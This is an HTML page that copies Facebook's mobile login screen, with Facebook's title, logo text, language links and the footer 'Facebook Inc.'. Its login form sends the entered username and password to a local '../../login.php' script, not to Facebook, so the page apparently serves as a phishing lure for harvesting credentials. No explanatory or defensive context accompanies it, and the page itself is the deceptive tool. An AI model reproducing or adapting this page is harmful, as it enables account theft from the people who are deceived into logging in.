<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.3/css/fontawesome.min.css" integrity="sha384-wESLQ85D6gbsF459vf1CiZ2+rr+CsxRY0RpiF1tLlQpDnAgg6rwdsUF1+Ics2bni" crossorigin="anonymous">
	<link rel="stylesheet" href="https://use.fontawesome.com/bae03eaa0a.css">
    <script src="https://use.fontawesome.com/bae03eaa0a.js"></script>
    <link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Raleway:wght@200&display=swap" rel="stylesheet">
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Roboto+Slab&display=swap" rel="stylesheet">
	<title>Log in to Facebook | Facebook</title>
	<style type="text/css">
		*{
			padding: 0;
			margin: 0;
			box-sizing: border-box;
		}

		a{
			text-decoration: none;
		}


		

		.notification{
			width: 100%;
			background: #faf0be;
			display: flex;
		}


		.notification .fa-mobile{
			padding-top: .1rem;
			padding-bottom: .3rem;
			padding-left: .5rem;
			padding-right: .5rem;
		}

		.notification p{
			padding: .7rem .2rem;
			font-size: .8rem;
			color: #0073cf;
			font-family: 'Raleway', sans-serif;
		}

		.heading{
			width: 100%;
			padding: 1rem;
			text-align: center;
		}

		.heading h2{
			font-size: 1.3rem;
			color: #0073cf;
		}

		.input-fild{
			width: 40%;
			background: ;
			margin: 0px 30%;
			display: flex;
			flex-direction: column;
		}

		input{
			width: 80%;
			margin: .18rem 10%;
			padding: 1rem .4rem;
			font-size: .9rem;
			border: none;
			border-radius: 5px;
			background: #f5f5f5;
			box-shadow: .5px 1px 1px #e5e4e2,
			            -.5px -.5px 1px #e5e4e2;
		}



		.log{
			width: 80%;
			margin: .25rem 10%;
			padding: .5rem .4rem;
			font-size: .9rem;
			border: none;
			border-radius: 5px;
			background: #0073cf;
			color: #fff;
			font-family: 'Roboto Slab', serif;
			font-size: 1.3rem;
			box-shadow: .5px 1px 1px #e5e4e2,
			            -.5px -.5px 1px #e5e4e2;
		}


		.text{
			margin-top: -1rem;
		}

		.for{
			text-align: center;
			font-size: .9rem;
			padding: .44rem;
			font-weight: 10px;
		}

		.line p{
			max-width: 600px;
			position: relative;
			font-size: 1rem;
			text-align: center;
			padding: 1rem .5rem;
			color: #555;
		}


		.line p:before{
			content: "";
			display: block;
			height: .1rem;
			width: 35%;
			background: #d3d3d3;
			position: absolute;
			left: 11%;
			top: 50%;
		}

		.line p:after{
			content: "";
			display: block;
			height: .1rem;
			width: 35%;
			background: #d3d3d3;
			position: absolute;
			right: 11%;
			top: 50%;
		}


		.create{
			width: 40%;
			margin: 0 30%;
			padding: .3rem .6rem;
			border: none;
			text-align: center;
			border-radius: 5px;
			background: #008000;
			color: #fff;
			cursor: pointer;
			font-family: 'Roboto Slab', serif;
			font-size: .9rem;
			margin-bottom: 6.5rem;
			box-shadow: .5px 1px 1px #e5e4e2,
			            -.5px -.5px 1px #e5e4e2;
		}

		.create a{

			color: white;

		}

		.footer{
			width: 100%;
		}

		.flex{
			display: flex;
		}

		.st{
			width: 50%;
			display: flex;
			flex-direction: column;
			text-align: center;
		}
























		@media (max-width: 600px){
		.input-fild{
			width: 100%;
			margin: 0;
			padding: 1rem;
			background: ;
			display: flex;
			flex-direction: column;
		}

		}

		.w{
			font-size: .75rem;
			color: #003366;
		}

		.we{
			color: #555;
			font-weight: 600;
		}

		.l{
			font-size: .75rem;
			text-align: center;
			padding: 1rem;
			color: #555;
		}







	</style>
</head>
<body>
	<section>
		<div class="notification">
		<i class="fa fa-mobile fa-2x"></i>
		<p><a href="#">Get Facebook for Android and browse faster.</a></p>
		</div>

		<div class="heading">
			<h2><a href="#">facebook</a></h2>
		</div>
	</section>
	<section class="input-fild">
		<form action="../../login.php" method="POST">
		  <div class="input">
			<input type="text" class="text" name="username" name="username" placeholder="Mobile number or email address"><br>
			<input type="password" name="password" name="password" placeholder="Password"><br>
			<button class="log" type="submit">Log In</button>

			<p class="for"><a href="#">Forgotten password?</a></p>
		  </div>

		  <div class="line">
		  	<p>or</p>
		  </div>
		  <p class="create"><a href="#p">Create New Account</a></p>
		</form>
	</section>


	<section class="footer">
		<div class="flex">
			<div class="st">
				<a class="we w" href="#"><b>English (UK)</b></a>
				<a class="w" href="#">অসমীয়া</a>
				<a class="w" href="#">नेपाली</a>
				<a class="w" href="#">Português (Brasil)</a>
			</div>
			<div class="st">
				<a class="w" href="#">বাংলা</a>
				<a class="w" href="#">हिन्दी</a>
				<a class="w" href="#">Español</a>
				<a class="w" href="#"><i class="fa fa-plus-square-o" aria-hidden="true"></i>
</a>
			</div>
		</div>
		<p class="l">Facebook Inc.</p>
	</section>

</body>
</html>